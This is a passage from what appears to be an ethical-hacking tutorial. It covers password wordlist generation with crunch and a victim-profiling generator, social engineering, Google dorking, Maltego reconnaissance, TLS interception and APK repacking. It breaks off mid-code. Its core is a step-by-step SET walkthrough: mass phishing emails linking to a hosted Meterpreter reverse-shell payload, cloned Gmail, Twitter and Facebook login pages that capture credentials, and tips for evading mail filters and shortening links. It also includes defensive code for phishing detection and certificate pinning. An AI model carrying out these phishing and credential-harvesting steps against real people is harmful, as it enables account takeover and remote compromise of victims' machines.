So, let us look at the content of this file. It has all the named character
sets: numeric, alpha-numeric, loweralpha, mixalpha, and so on. To use it in
crunch, run the same command but with the -f argument followed by the path of
the file and the name of the character set. Open the file in Leafpad to find the
name you want, for example loweralpha-numeric, then go back to the terminal and
run:
crunch 4 4 -f /usr/share/rainbowcrack/charset.txt loweralpha-numeric -o rainbow-wordlist.txt -z gzip

This uses the loweralpha-numeric set from that file, writes the output to
rainbow-wordlist.txt and, because of -z gzip, compresses it, so the file on disk
is rainbow-wordlist.txt.gz. Press Enter and wait for the result: every
combination of four characters from the lowercase alphanumeric set, which is
36^4 = 1,679,616 lines.

Let us look at the file after unzipping it with gunzip. All the passwords are
four characters long and cover every combination of the chosen character set.
A sample is shown below.
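The two generators above are easy to reproduce in a few lines, which is the best way to see what they actually enumerate. The following added Python example, mine and not code from crunch or CUPP, implements the crunch -t placeholder rules (@ , % ^) and the plain charset enumeration, plus a miniature CUPP-style profiler that combines the victim's terms with years and suffixes, varies case and adds leet spellings; the leet map and the symbol set are assumptions, and the output is written with gzip the way crunch -o with -z gzip does.

```python
import gzip
import itertools

# crunch's four placeholder classes for -t patterns; the symbol set is an assumption
LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = LOWER.upper()
DIGITS = "0123456789"
SYMBOLS = "!@#$%^&*()-_+="

# Assumed leet substitutions, the same idea as CUPP's "leet mode" (p@ssw0rd)
LEET = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "$", "t": "7"}


def charset_wordlist(charset, min_len, max_len):
    """crunch <min> <max> <charset>: every string of the given lengths over charset."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def pattern_wordlist(pattern, lower=LOWER, upper=UPPER, digits=DIGITS, symbols=SYMBOLS):
    """crunch -t: @ = lowercase, , = uppercase, % = digit, ^ = symbol, anything else literal."""
    classes = {"@": lower, ",": upper, "%": digits, "^": symbols}
    pools = [classes.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*pools):
        yield "".join(combo)


def leet_variants(word):
    """The word itself plus its leet spelling, when that differs."""
    yield word
    leet = "".join(LEET.get(ch.lower(), ch) for ch in word)
    if leet != word:
        yield leet


def profile_wordlist(terms, years=(), suffixes=("!", "123")):
    """CUPP -i in miniature: pair up the victim's terms, append years and suffixes,
    vary the case, then add leet spellings. Returns a sorted, de-duplicated list."""
    base = sorted({t.lower() for t in terms if t})
    stems = set(base)
    for first, second in itertools.permutations(base, 2):
        stems.add(first + second)
    words = set()
    for stem in stems:
        for form in (stem, stem.capitalize(), stem.upper()):
            words.add(form)
            words.update(form + year for year in years)
            words.update(form + suffix for suffix in suffixes)
    return sorted({variant for word in words for variant in leet_variants(word)})


def write_wordlist(words, path, compress=False):
    """Like crunch -o (and -z gzip): one candidate per line; returns the number written."""
    opener = gzip.open if compress else open
    count = 0
    with opener(path, "wt") as handle:
        for word in words:
            handle.write(word + "\n")
            count += 1
    return count


if __name__ == "__main__":
    print(sum(1 for _ in pattern_wordlist("@%,Z")), "candidates for crunch 4 4 -t @%,Z")
    profile = ["John", "Doe", "Joe", "Tom", "Innovate"]            # the victim from the text
    words = profile_wordlist(profile, years=("1992", "92", "2000", "2004"))
    print(len(words), "profile candidates, for example", words[:5])
    print("wrote", write_wordlist(words, "john.txt.gz", compress=True), "lines to john.txt.gz")
```

The point of the profiler is visible in the numbers: a few personal terms expand to a list of a few thousand candidates that is tiny compared with a blind crunch run, yet is far more likely to contain the real password. Pass the list to the cracker of your choice exactly as you would john.txt from CUPP.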
Proven Social Engineering Techniques
Attack Vectors
Social engineering is the art of manipulating people psychologically so that
they give up confidential information; none of the technical approaches we
learned earlier are needed. One attack vector is pretexting, which is inventing
a scenario in order to lure the victim into participating in it.
A famous example is the advance-fee email about an African prince who has
passed away and named you in his will, where you are asked to send a copy of
your passport and a few dollars in fees so that the inheritance can be
processed; some people still fall for this trick.
Another attack vector is diversion theft, which the following example
illustrates. You go to a bank to deposit money at an ATM, and someone tells you
that the ATM is out of order and that you can deposit the money instead in a
van or a kiosk that supposedly belongs to the bank. The attacker diverts the
victim's attention, or the action the victim was about to perform, towards a
destination the attacker controls.
Phishing is the act of sending emails that appear to come from a legitimate
business or bank, in which you are asked to provide or "verify" information
such as a credit card number and CVV. Spear phishing is the same technique
aimed at a specific group or individual. Mass phishing is sent to everyone and
has a low success rate; in spear phishing the attacker does more research and
targets a particular group of people, so the probability of a successful attack
is higher.
Baiting attacks use a false promise to pique a victim's greed or curiosity. For
example, you put a malicious file on a USB drive and leave it in a public place
such as a parking lot, an elevator or a walkway, perhaps labelled "confidential"
or "salaries 2021". Some people will fall for the trick: they pick the drive up
and plug it into their computer just out of curiosity to see what is on it. At
that moment, depending on the payload, the computer is infected and the attacker
may gain full remote control over it.
Tailgating is when the attacker gains access to a restricted area by following
a person who opened the door with legitimate access, so that the attacker enters
without any identification or any questions asked.
Vishing is voice phishing: the criminal practices social engineering over the
telephone to obtain private or personal financial information.
A watering hole attack is similar to phishing, but in a different context. Most
people today are aware of phishing and are reluctant to click links in
unsolicited emails, but they will click links on the websites they trust. The
attacker therefore researches which websites the target visits most, looks for
vulnerabilities in those websites, and uses them to inject malicious links or
code. Since the user trusts the website, he or she is far more inclined to click.

Open-source Intelligence (OSINT):


What is your primary source of data? You might answer Google, but the fact
is that there is an ocean of data out there that Google does not index. Which
sources matter depends on your use case: you collect the information relevant
to the kind of attack you are preparing.
Open-source intelligence, abbreviated OSINT, is the collection and analysis of
information gathered from public or open sources. It has many sources. Media:
newspapers, magazines, radio and television, for information related to the
target you want to attack or compromise.
The internet: the easiest way is YouTube, Facebook, Twitter, Instagram, Google,
blogs, discussion groups, and people-search sites such as Pipl and Hunter.
Another source is public government data, such as speeches, websites, press
conferences and telephone directories. Another is commercial data, such as
professional and company databases. Another is academic publications such as
conference proceedings, papers and journals. And last but not least, grey
literature such as patents, reprints and technical reports.

Google Dorks Live Examples


Google dorking, or Google hacking, is an information-gathering technique that
uses Google search to find security holes in the configuration of a server,
application or website: pages, files and devices that were indexed but were
never meant to be public. You leverage the advanced search operators offered by
Google to locate specific strings within a result. The operators used most are
site:, filetype:, inurl:, intitle: and intext:.
So, let us jump directly to an example to demonstrate what I am talking about.
Suppose that you want to search for a confidential document published under a
governmental website. You have to decide what to search for: the kind of site,
the type of document, and a phrase such a document would contain.
We start with the site: operator, which restricts the results to a domain or
top-level domain, in this case .gov. filetype:pdf restricts the results to PDF
files, and the quoted string is the exact text we are looking for, such as
"this document is confidential":
site:gov filetype:pdf "this document is confidential"

We get a list of PDF files, and we have to look into them. Open them and search
for the word "confidential". This is just a basic way to search for confidential
documents; if you have a specific target in mind, you need to refine the search
criteria. But in general, it is very easy to find such information with Google.
Suppose that you want to find passwords. Some log files contain the string
"your password is", so search for that string in text files:
"your password is" filetype:txt
This brings up a couple of log files that you can open and read. Below is a
sample result.
Suppose that you want to search for IP cameras or print servers that are
exposed on the internet. Two operators come in handy here, intitle: and
inurl:. intitle: searches only the title of the page, and inurl: searches only
the URL of the page. So, searching for "network print server" in the title with
file type shtm,
intitle:"network print server" filetype:shtm
gives a couple of results.

Another example: to find pages with grades, say final grades, on an educational
site, use inurl: together with site:
inurl:"final grades" site:edu
You will get a list of final grades with student IDs. As you notice, you can
tailor the search any way you want using the advanced operators; inurl:, intext:,
filetype: and site: are the basic ones, and there are many more.

And let me tell you something else. Instead of keeping all those operators in
your head, you can go to the Google Hacking Database on
www.exploit-db.com/google-hacking-database, where community-submitted dorks are
collected in one place. All you have to do is pick a category, for example
Vulnerable Files or Files Containing Passwords. Some examples are shown below.
If you master Google search and its advanced operators, you can find anything
that has been published online and indexed, such as firewall and intrusion
detection system consoles, video recorders, UPS monitors, even building
management systems, IP telephones, and even leaked credit card numbers and CVV
codes. To have a smooth start, get yourself familiar with the categories of the
Google Hacking Database on the Exploit-DB website.

Collect and Visualize Data with Maltego


The more information we have about a target, the more likely we are to find a
way into the system we want to exploit. Maltego, developed by the South African
company Paterva, is a GUI tool for building and visualizing the relationships
between entities found on the internet: people and their names, email
addresses, aliases, the companies and organizations they are linked to,
websites, and so on. It is a very useful tool.
Open Maltego from the main menu. The first time, you have to register and log
in; you can register from within the application or at paterva.com. Below is
the default view after you sign in.
Transforms are the tools Maltego uses to query a data source about an entity
and perform one specific task; you will use them a lot. A graph is the visual
workspace that shows the relationships between entities. A machine is a scripted
sequence of transforms that Maltego runs automatically to gather the information
it wants.
Some transforms are free, others are paid. Depending on what you want to do,
you may need to buy some or stick to the free ones.
I will install the default ones (dataprovider.com); it is very easy, just click
the Install button and it populates the application with the relevant transforms.
Press Finish and get yourself familiar with the menu.

To start, click the icon to create a new graph. On the left side, you will see
the entities you can start from. The concept of Maltego is that you drag an
entity onto the graph and then drill down from it. You can start with a domain
name, a person or a company; there are lots of entities to start with, such as
an email address. In our case, we will start with a domain name.

Drag the domain entity onto the graph, double-click on the icon, and enter the
domain name you want to investigate. Suppose that I want to look into souq.com.

Press OK, then right-click on the icon and you will see a list of transforms
related to DNS, domain owner details, email addresses found on this domain,
files, and more. We can get lots of information just by starting from a domain;
to make it easy, press Run All and watch the progress bar below.
Once it finishes, it populates a very complex but useful graph. You see the
entity and the DNS records associated with this domain; double-click on each to
see the details. The relationships are shown top-down: related websites, the MX
records, the location of this domain, email addresses found on it, the name
servers, the website itself, the people whose names appear on the website,
telephone numbers, and so on. Below is the graph zoomed out and zoomed in.
It is always interesting to look at the email addresses and the people. As you
can see below, for the person Shaker Qawasmi you can right-click and run
another transform to get more details.

As we said earlier, I am using the free transforms; the paid ones require an
account on the relevant provider's website and an API key before you can use
them. So let us try to get the email address of this person by right-clicking
on him and running the transform. Finally, we get the person's email address
on souq.com. It is a very handy tool that gives you lots of information related
to the target you want to investigate.

Execute a Phishing Attack


Phishing is a type of social engineering attack often used to steal user data,
including login credentials and credit card numbers. An attacker impersonating
a trusted entity tricks a victim into opening an email, instant message or text
message, and then into clicking a malicious link, which can lead to the
installation of malware, the locking of the system as part of a ransomware
attack, or the disclosure of sensitive information.
We will now execute a phishing attack using SET, the Social-Engineer Toolkit.
Open a terminal and run setoolkit, or find it in the main menu as Social
Engineering Toolkit. Choose Social-Engineering Attacks (option 1), then Mass
Mailer Attack (option 5).

The tool then asks what you want to do: target a single email address or a
list. We want a list, so select option 2; it asks for the path of the file
containing the addresses. For this purpose, I created a text file of random
email addresses and provide its path.
Next it asks whether to send through a Gmail account or through your own server
or an open relay. I will use a Gmail account, but you can use an open relay as
well. Then it asks for the sender name that will appear, whether to flag the
message as high priority (no), and whether to attach a file. I will not attach
a file, because malicious attachments are usually blocked at the email gateway,
whether by a firewall or by the mail filtering system, so attacks that rely on
an attachment rarely get through. It is better to provide a link: once the
victim clicks it, the file is downloaded from our server instead.
I write a subject, "salaries" for example, and choose to send the email as
plain text rather than HTML.

Now it asks for the body. In the body, I will put a link to a malicious file
hosted on my machine. For this purpose, open another terminal and run
setoolkit again; select Social-Engineering Attacks, but this time Create a
Payload and Listener (option 4). We will generate the payload, host it on our
web server and put the link in the email. Choose option 2, Windows Reverse_TCP
Meterpreter; LHOST is the local IP address of the Kali machine and LPORT the
listener port, 4444 by default. Generating the payload takes a moment, and
finally it tells you the path where the payload was written. Copy that path.
Now it asks whether to start a listener.
Yes, start the listener. It opens a Metasploit console with the handler waiting
for connections. Meanwhile, in a new terminal, copy the generated .exe from that
path into the web root, /var/www/html, and make sure Apache is running (service
apache2 start).
How can the victim reach it?
At http://<kali-ip>/payload.exe. To make the link less suspicious, go to
bitly.com, paste that URL and shorten it. Copy the short link, go back to the
first SET window, paste it into the body, press Enter and then type END. The
tool will now attempt to send the email to every address in the provided text
file.

If we go to the victim machine and check the mailbox (we are using a disposable
address from tempmail.org for this purpose), we notice a new email. Open it and
you will find the link to the malicious file hosted on our server. Click it and
save the file to the desktop, or just run it directly. Run it, and the Metasploit
console on the Kali machine reports that a Meterpreter session has been opened;
we now have full access to the remote computer. Note that this only works on a
lab machine with antivirus disabled: the default SET payload is well known and
is detected by almost any current endpoint protection.

Hack Facebook, Twitter, and Gmail Accounts


For anyone who has been on the internet in the past 20 years or so, hacking is
not a surprising concept. After all, a new attack is launched against a
business, organization or individual every 39 seconds. Many people can
recognize a phishing email and know to avoid it, but a social media account
takeover is a different beast. We will learn how attackers get into Facebook,
Twitter and Gmail accounts: not by breaking the sites, but by harvesting the
credentials users type into a cloned login page.
Open SET again. You are prompted with a main menu of six items; we are
interested in Social-Engineering Attacks, so press 1. The next menu lists eleven
social engineering methods; in this section we want Website Attack Vectors, so
press 2, then Credential Harvester Attack Method, number 3. You can then use one
of the web templates that ship with SET, tell the tool to clone a live website,
or point it at a custom directory from which to import a website.

We choose option 1, the built-in web templates. The IP address for the POST back
is the local IP address of the Kali machine; find it with ifconfig, enter it,
and SET asks which template you want to use.
First, let us use the Google template, number 2. SET creates the fake Gmail
login page under its own directory; this is the page we will use to harvest
credentials from users. Press Enter. If Apache is already listening on port 80,
SET asks whether to stop it so that its own web server can use that port; say
yes. The harvester is now ready, and our IP address is serving a fake Gmail
login page.
To test it, open a browser on the Windows machine and enter the IP address of
the Kali machine: a Google sign-in page appears. Type any email address and any
password and click Sign in. Observe the behavior: the browser is redirected to
the real Google page, while on our machine the submitted credentials are
captured.
You will see the email and password that were entered.

It can generate a report as well.

We can do the same for Twitter: select the Twitter template, go back to the
browser, open the website again, enter any email and password and press Sign
in. The credentials are captured and the browser is redirected to the Twitter
homepage, so a normal user will not notice anything. Again, on the Kali machine
you will find the captured credentials. That covers the attacks on Gmail and
Twitter; let us see how Facebook works.
For the Facebook example we will not use a template but the Site Cloner: select
option 2, enter the local IP address again, and then the site you want to
clone, in this case https://login.facebook.com. SET reports that all the files
have been copied and that it is running on port 80. Go back to the browser,
open the same IP address, enter any email and any password and press Log in.
You will notice the same behavior: you land on the legitimate Facebook page,
and the credentials you entered have been captured.
To make this a real attack you need to publish your web server, which you can
do with port forwarding, but it is not advisable to hand out your own public IP
address. We will learn more about hiding our identity in the upcoming sections.
For the time being, you can go to bitly.com, paste the URL built from your
public IP and get a short link. Send it by email to anyone, and once the person
clicks it, he or she is redirected to the page hosted on your server.

So, now we have learned how to spoof Facebook, Twitter and Gmail pages and how
to harvest the credentials entered on them. If you link this to some of the
techniques we studied earlier, such as DNS poisoning and ARP poisoning, you can
chain them into a real-world scenario that combines social engineering with
network attack techniques.
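Both attacks above leave simple fingerprints: the mass-mailer link points at a raw IP address or a link shortener and ends in .exe, and the harvester page is served from an IP address over plain HTTP and collects a password on a page that is not the site it imitates. The following added Python example, my own and not part of SET or of the book, checks an email and a login page for exactly those indicators. The indicator lists and the sample message and page are constructed for the demonstration, and 192.0.2.10 is a documentation address, not a real host.

```python
import email
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed indicator lists for this demonstration (a mail gateway would use maintained ones)
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd"}
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".hta", ".js", ".vbs", ".msi")
URL_RE = re.compile(r"https?://[^\s<>\"']+")

# Constructed samples modelled on the attack in the text; 192.0.2.10 is a documentation address
SAMPLE_EMAIL = """From: hr@example.com
To: staff@example.com
Subject: salaries

The updated salary sheet is at http://192.0.2.10/payload.exe
or, if that is blocked, at https://bit.ly/3abcxyz before Friday.
"""
SAMPLE_PAGE = """<html><body><form action="" method="post">
<input type="email" name="Email"><input type="password" name="Passwd">
<input type="submit" value="Sign in"></form></body></html>"""


def host_is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def url_indicators(url):
    # Reasons a link resembles the SET mass-mailer payload link, in a fixed order
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    flags = []
    if host_is_ip(host):
        flags.append("ip-literal host")
    if host in SHORTENERS:
        flags.append("link shortener")
    if parts.path.lower().endswith(EXECUTABLE_SUFFIXES):
        flags.append("executable download")
    if parts.scheme == "http":
        flags.append("plain http")
    return flags


def analyze_email(raw_message):
    # Map every flagged URL in the text/plain and text/html parts to its indicators
    msg = email.message_from_string(raw_message)
    findings = {}
    for part in (msg.walk() if msg.is_multipart() else [msg]):
        if part.get_content_type() not in ("text/plain", "text/html"):
            continue
        text = part.get_payload(decode=True).decode(part.get_content_charset() or "utf-8", "replace")
        for url in URL_RE.findall(text):
            flags = url_indicators(url)
            if flags:
                findings[url] = flags
    return findings


class _LoginFormParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions = []
        self.has_password_field = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.actions.append(attrs.get("action") or "")
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password_field = True


def analyze_login_page(html_text, page_url):
    # Indicators that a login page is a harvester clone rather than the real site
    parser = _LoginFormParser()
    parser.feed(html_text)
    page = urlparse(page_url)
    page_host = (page.hostname or "").lower()
    flags = []
    if host_is_ip(page_host):
        flags.append("login page served from ip-literal host")
    if page.scheme == "http" and parser.has_password_field:
        flags.append("password form over plain http")
    for action in parser.actions:
        target_host = (urlparse(action).hostname or "").lower()
        if target_host and target_host != page_host:
            flags.append("form posts to foreign host " + target_host)
    return flags


if __name__ == "__main__":
    for url, flags in analyze_email(SAMPLE_EMAIL).items():
        print(url, "->", ", ".join(flags))
    print(analyze_login_page(SAMPLE_PAGE, "http://192.0.2.10/"))
```

None of these checks is proof of phishing on its own; a mail gateway or browser extension would score them together and combine them with sender and certificate checks. The useful lesson for the attacker's side is the mirror image: the shortened link, the bare IP and the .exe download are precisely what gets a campaign blocked, which is why real phishing uses a registered look-alike domain with a valid certificate.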
Perform Attacks on Mobile Phones
Mobile Attack Surface
Nowadays, mobile devices dominate consumer habits from both a personal and an
enterprise perspective; they are ubiquitous. The basic risk areas can be divided
into five main mobile application security categories, starting from the mobile
device itself and going through network security, web service security, database
security, and application management procedures.
The mobile device risk spectrum starts with data storage: is the data on the
device encrypted or not? For data transmission, it is HTTPS versus HTTP, and
SFTP or FTPS versus plain FTP: is the application using secure protocols or
open ones?
Reverse engineering is a very important area when we talk about mobile
applications. Are there binary protections in place, such as obfuscation and
tamper detection? If not, anyone can take the app package, decompile it,
recover much of the source code and learn the details of the architecture of the
mobile app and more.
When you install an application you grant it access to local resources: does
the application have access only to the resources it needs, or does it hold
elevated permissions? The next attack surface is the network. Here we mainly
talk about HTTPS versus HTTP, that is, using TLS, because doing so covers the
wireless connectivity issues: it prevents session hijacking and defeats DNS
spoofing, since a spoofed server cannot present a valid certificate for the
real name.
We need to know how these technologies work. Does using TLS mean you are safe?
No. We will see in the following examples that, with a trusted proxy certificate
installed on the device, we can decrypt TLS as if it were not there. So we need
to know how to use TLS properly within our mobile applications.
Another important security aspect is web server security. Do we have a process
in place to identify and apply critical security patches? Do we have a process
to assign roles and responsibilities for the people who own the actions
performed on the web server? Do we mitigate denial-of-service and automated
abuse with measures such as rate limiting and CAPTCHA? Do we have lockout
policies to detect and block accounts that are being brute-forced with incorrect
passwords? These are generic threats, not specific to the mobile attack surface,
but it is important to mention them here.
The next attack surface is the database: who has privileged access to our
database? Are we validating and sanitizing the data we receive from the
applications before we insert it into the database? Are we checking the logic of
the data we receive from mobile apps? Are we applying the latest patches to the
database?
The last mobile attack surface concerns application management threats. As you
know, many enterprise mobile apps are distributed through mobile application
management software. So, who has access to this management software? Who can
publish our app to stores such as Google Play or the Apple App Store? Is our
mobile app signed with the enterprise's own signing key? Who can perform a remote
wipe, either of the whole device or only of the organization's data?

Decrypt TLS Sessions


TLS decryption is the ability to view the traffic inside an HTTPS connection as
it passes through an inspection point such as a proxy or a firewall.
How Does HTTPS Traffic Work?
The web application, web browser or mobile application requests a secure page
from the server. The server receives this request and sends back its
certificate, which contains its public key. Now the browser or application has
to perform a couple of important checks. First, it needs to make sure that the
certificate it received is not expired, is not revoked, and is issued by a
certificate authority it trusts. On top of that, it needs to ensure that the name
in the certificate (the subject alternative name, or the common name in older
certificates) matches the hostname of the website it is connecting to. After
that, in the classic RSA key exchange used by TLS 1.2 and earlier, the client
creates a random secret, encrypts it with the public key it received in step two
and sends it to the server, which decrypts it with its private key; both sides
then derive the symmetric session keys from that secret. (TLS 1.3, and TLS 1.2
with ephemeral Diffie-Hellman cipher suites, agree the secret with a
Diffie-Hellman exchange instead, so the server's private key only signs the
handshake; the rest of the picture is the same.)
Now the mobile application or web browser and the web server share symmetric
session keys. The web server encrypts the pages and information it sends to the
client with the session key, and the client decrypts them with the same key.
With that in mind, we will take the example of a mobile application connecting
to a server.
Looking for vulnerabilities in a mobile application presents multiple
challenges, one of which is the ability to intercept, and possibly edit, the
encrypted communication between the mobile device and the server it is
talking to. Knowing the content of the communication is very important when
we are looking for possible leaks of sensitive information.
In the upcoming example we will learn how to set up a proxy server that
allows us to analyze the communication taking place between the mobile
application and the server. This is essentially a traditional man-in-the-middle
attack: we redirect the traffic going from the mobile application to a proxy
server. For that, we need to install the certificate issued by the proxy,
which is a self-generated or self-signed certificate, a spoofed certificate.
The certificate needs to be installed on the mobile device, so that the
communication between the mobile and the proxy becomes trusted. We will then
be able to decrypt the SSL communication, since we hold both the public and
the private key of that certificate.

Now we have two channels: one between the mobile and the proxy, and the
other between the proxy and the server. The channel between the mobile and
the proxy uses the fake, self-generated certificate; we can look into this
channel because we hold its public and private key. The other channel,
between the proxy and the original server, uses the original certificate
provided by the server itself.
On our mobile device, we need to change the proxy settings to point to the
IP and port number of the proxy we have just set up. It is worth mentioning
that we will be using a proxy server called Charles for this example, but you
can use any proxy server out there, because the concept is the same: Burp,
Fiddler, or any other man-in-the-middle proxy.
On top of that, you can also download mobile applications, especially on
Android devices, that mimic this whole setup. It may be easier for you to
just download an application that automatically installs a certificate on
the mobile so you can capture and analyze the traffic. You can use SSHDroid
or ProxyDroid, among many other applications on the Google Play store.
Coming back to the procedure, go to www.charlesproxy.com and install the
proxy from there. After that, open the application and you will be presented
with the interface shown below.
Now we need to go to our mobile device and route all its traffic through
the proxy. To do so, go to the Wi-Fi connection you are currently using, then
go to configure proxy, select manual, and enter the server and port that
Charles proxy is running on. In Charles, go to the Help menu, then SSL
proxying, and choose to install the certificate on the mobile device. Charles
proxy will tell you its IP and the port number it is running on; we use this
information to configure our mobile to pass all traffic through the proxy.
Now open the browser on the mobile; you will notice that it tells you to
browse to a URL to download and install the certificate. Charles has
generated a self-signed certificate, which we need to install on our mobile
device. To do so, we open the browser and go to charles.pro/ssl, and it
prompts us to install this profile or certificate. Just press install,
install again, and done; the certificate is now installed.
In Charles proxy, go to the SSL proxy settings, where SSL proxying is
disabled by default. We will open a generic mobile app on our device and try
to log in with a generic username and password on any page that accepts
login credentials. Press login, and you will notice on the left side that
Charles highlights the event taking place. If you click on it, it tells you
that SSL proxying is not enabled; if you go to Contents you will see
scrambled content, since the connection to the server is encrypted and we
are not able to see any of this traffic.
To be able to look inside the tunnel, go to the SSL proxy settings and
enable SSL proxying, keeping in mind that we have already installed the
certificate on our mobile. Press OK, go back to the mobile application, clear
the session, and log in again. You will see the activity appear below, and a
file structure being populated under this URL.
Click on this file and go to the Contents tab; you will be able to see the
username and password we used, along with other information. The information
on the top is the request and the information at the bottom is the response
we got from the server. Since the generic credentials were not accepted, the
response is an unauthenticated one.

From the sequence view, you will be able to see all the connections passing
through this proxy and their results. So this is a successful attempt: we
have got cookie information and API URL information, even though the sign-in
itself was not successful.
Go back to the mobile and try to sign in with a real username and password
to authenticate to this application. Keep in mind that we are doing this only
to test whether our own application is secure over the internet.
Charles proxy captured lots of information: authorization codes,
profile-related information, cookies, and some of the internal hierarchy on
the server. The more you navigate through the mobile app, the more
information you will be able to collect in Charles proxy.
The most important point is that if such a proxy sits on, for example, a
hotspot, and users authenticate through it, whoever runs it will be able to
see all this information. Under Cookies, you will see all the cookie values
we were able to get. Under Text, you will see the URL with the device token,
username, and password used to authenticate; the same goes for the Form and
Raw views.
This is an important piece of information that an attacker can use to
perform another attack. I therefore recommend encrypting this information at
the application level, in the code itself. Do not depend on SSL or the
encrypted tunnel alone; you have to take security measures at the level of
the application while writing the code.
It is obvious that the mobile application we tested did not perform some of
these steps correctly. The application is not checking whether the
certificate was issued by a trusted authority; it simply accepted our
self-signed certificate. Unfortunately, mobile application developers often
ignore the need to check certificates; they blindly accept any SSL
certificate without understanding how SSL works. To protect against that,
use certificate pinning. With pinning, you check that the certificate
presented, and the name on it, matches the one expected for the web server
you are connecting to, and once that is in place any other certificate is
automatically rejected.
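The checks described under "How Does HTTPS Traffic Work?" and the pinning recommended here, written out as an added example (not code from the book): the permissive setting that let the tested app accept the proxy's certificate, next to a hardened context and a pin check. It assumes the pin is the SHA-256 of the server's DER certificate obtained out of band (for example baked into the app at build time); host and port are placeholders.

```python
"""Added example, not from the book: the certificate checks a client must
make, next to the permissive setting that lets an interception proxy's
self-signed certificate through. The pin is assumed to be the SHA-256 of the
server's DER certificate, recorded out of band at build time."""
import hashlib
import socket
import ssl
from typing import Optional, Set


def permissive_context() -> ssl.SSLContext:
    """The weak setting: nothing is verified, so a proxy's self-signed
    certificate is accepted and the tunnel can be read by whoever runs it."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False        # the name on the certificate is ignored
    ctx.verify_mode = ssl.CERT_NONE   # issuer, expiry and revocation are ignored
    return ctx


def hardened_context() -> ssl.SSLContext:
    """Trusted issuer, validity period and hostname match are all enforced;
    these are the defaults of create_default_context, kept explicit here."""
    ctx = ssl.create_default_context()  # loads the platform trust store
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def is_verifying(ctx: ssl.SSLContext) -> bool:
    """True only when both the certificate chain and the hostname are checked."""
    return bool(ctx.check_hostname and ctx.verify_mode == ssl.CERT_REQUIRED)


def fingerprint(der_cert: bytes) -> str:
    """SHA-256 over the DER encoding: the value that gets pinned."""
    return hashlib.sha256(der_cert).hexdigest()


def certificate_matches_pin(der_cert: bytes, pins: Set[str]) -> bool:
    """The pin check: only a certificate whose fingerprint is in the pin set
    is acceptable, so a proxy certificate is rejected even when the device's
    trust store has been told to trust it."""
    return fingerprint(der_cert) in pins


def pinned_connect(host: str, port: int, pins: Set[str],
                   context: Optional[ssl.SSLContext] = None) -> ssl.SSLSocket:
    """Open a TLS connection and refuse it unless the peer certificate passes
    both the trust-store validation and the pin check."""
    ctx = context or hardened_context()
    raw = socket.create_connection((host, port), timeout=10)
    tls = ctx.wrap_socket(raw, server_hostname=host)  # handshake + chain/name checks
    try:
        der = tls.getpeercert(binary_form=True)
        if not der or not certificate_matches_pin(der, pins):
            raise ssl.SSLCertVerificationError(
                f"certificate pin mismatch for {host}: {fingerprint(der or b'')}")
    except Exception:
        tls.close()   # never hand back a socket whose peer failed the pin
        raise
    return tls
```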

Reverse Engineer an Android Application


Applications can easily be decompiled using many available tools. This
opens the door to many forms of abuse, such as intellectual property theft,
data leakage and theft, and credential harvesting. On top of that, an
attacker can clone the application, tamper with it, and publish it online
again for people to use.
First of all, we need the apk file. Usually you install applications on
your mobile phone, but you can extract the apk using one of many available
applications. Download a tool called APK Extractor and open it; it
automatically loads all the applications installed on your phone, so you can
browse and, with a click of a button, select the application you want to
extract as an apk file.
Press on any application to extract its apk file to local storage. In local
storage you will find the extracted apks under the extracted apks folder.
Now we can move the apk files from our mobile to the Kali machine, under the
extracted apks directory.
You have WhatsApp installed, right? Let us try to decode it. For this
purpose, we will use apktool, available in Kali, which decodes the resources
from the original file and can rebuild them after changes are made. Use the d
argument to decode and b to build.
Type in apktool d -f -r whatsapp.apk and decoding will start.

After decoding is over, navigate to the resulting directory and check the
files. You will see the extracted files organized much like an Android
project, with the assets, the resources, and the code itself. Assets are
files that are not compiled into the source of the project, while resources
are compiled into the Android code. Drill down into the assets and you will
see the compiled strings, lists of values, and the fonts being used, as well
as the graphics used within the WhatsApp application. If you go to the code,
the files have the smali extension, which is the disassembled form of the
Java code extracted from the WhatsApp application. To get back to the actual
Java code, you need to use an application called dex2jar.
Suppose that you made some changes to the WhatsApp code; now we need to
build these files into a new apk file ready for distribution. For this
purpose, use apktool again with b for build, give it the directory name
exactly (it is WhatsApp, with uppercase letters), and use the -o argument to
name the output mywhatsapp.apk: apktool b WhatsApp -o mywhatsapp.apk. This
builds the package again, taking into account the changes we made. It takes
some time and in the end it creates the new apk file, as shown below.
As you can see below, this is my new version of WhatsApp, called
mywhatsapp.apk.
Can we prevent hackers from decompiling our applications? Generally
speaking, we can make their life harder, and the harder we make it, the fewer
will persist. It takes a lot of time and effort to make our code difficult to
crack, and we cannot make it impossible. So here are some tips we can use to
make the hacker's life difficult.
We can use code obfuscation, which is the usual term for it: we mystify or
complicate our code. We can use applications such as ProGuard and DexGuard,
which do a good job of making reverse engineering difficult; they can encrypt
strings and detect code tampering. ProGuard is an open-source application,
while DexGuard is a commercial, paid application that does a better job than
ProGuard.
You can also use the NDK, the native development kit for Android, to write
libraries in C and import them into your Java code, which makes them harder
to decompile. Regardless of how much you complicate the code, always encrypt
the messages you send and make sure those messages cannot be replayed. Use
timing or some kind of sequence number to assure the integrity of the
communication between the application and the server, and always
authenticate your client.
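The timing-and-sequence advice above, as an added example (not from the book): each request carries a timestamp and a single-use nonce and is signed with a key shared with the server, so a captured message cannot be replayed and the client is authenticated. The shared key, header names, paths and clock window are assumptions made for this demonstration.

```python
"""Added example, not from the book: signing each request with a shared key,
a timestamp and a single-use nonce, so that a message captured in transit
cannot be replayed and the client is authenticated to the server. The shared
key, header names, paths and clock window are assumptions."""
import hashlib
import hmac
import secrets
import time
from typing import Any, Dict, Optional, Tuple

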